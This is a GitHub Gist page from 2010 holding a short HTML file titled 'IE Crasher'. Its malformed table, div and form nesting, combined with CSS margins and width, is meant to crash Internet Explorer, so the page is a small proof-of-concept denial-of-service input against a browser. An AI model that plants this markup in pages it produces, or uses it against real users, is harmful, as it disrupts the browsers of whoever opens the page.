Created
October 30, 2010 19:00
-
-
Save gssbzn/655632 to your computer and use it in GitHub Desktop.
And HMTL code that can crash IE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head> | |
<style type="text/css"> | |
#a { | |
margin:0 10px 10px; | |
} | |
#b { | |
width:100%; | |
} | |
</style> | |
<title>IE Crasher</title> | |
</head> | |
<body> | |
<table><tr><td> | |
<div id="a"> | |
<form id="b"> | |
<input type="text" name="test"/> | |
</div> | |
</td><td width="1"></td></tr></table> | |
</body></html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment